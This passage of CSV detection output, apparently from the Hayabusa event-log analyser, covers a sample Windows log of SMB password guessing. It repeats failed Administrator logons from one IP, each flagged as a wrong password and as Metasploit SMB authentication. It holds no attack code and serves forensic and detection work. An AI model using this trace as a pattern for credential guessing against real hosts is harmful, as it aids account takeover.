Password,User: Administrator : Type: 3 : Workstation: 1peOkjbd1WXGEAAM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Tbw3V9MtLIcxr65R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CEZ2v1f6t0luDj4D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R0omMppAFlFhE1mG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0jMvVN9eSeGW3zcN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnFNYabbO7IpbVku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KtyTTNdqVikZGYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DCChjnFv2hMXXwgW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvIYRZSomaJYJOH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEirUFRscaOwTuAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: RwQgMM9H1oN4te9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JbGILYTcFwtYbDk1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5KzNsgWvyUhNEHd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KGvwbOtP3A5eDKCZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YZvtNNX511hIleST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJBRTeW6OQtNrt5u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hovgq99STVt2GzrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4kpT3gf0VCAVuVSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiB04AvkYp0PP3n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PPluKgaiT10oC35V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8nCOM9uUeqv9QBx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dSPrrNCh2FSWZKbI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLDnCjr4pSdKAMX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G0UnmfB7lcXKEAvn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogjMSxcUw7cF5dMa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75uB8ejsSV5CbagM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5MMHLnyrzBQxluHn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QXLn6fpmR52RBAz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcdlrSUzcFNpaK5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJjiRO5rJzZ8XtqP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ncBraDdG2htkHjXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lo9DNrL44Z2S2SYR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QKcFiKC5QiIoHtxy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sqvq9GwuPCO15lUV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XzgtJ3qUmkFiIY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1wc1Hjb4AK0Np1q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKYNy0JyxIlFusMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IrcKp13ut9M0pCi0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B3lJSH0r8iHAVhPF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ju3lCbvbwvkIKsBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: dQOHcZeAKQG6wHhC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBPkgoKDLABqdSQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqj4xOCsJg1j3IIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhBIu6wUPHc3DZAy : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0fI1GhH5YTOHbNN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7mLOWiojillZNYH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37dknpwsl8j1WRWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
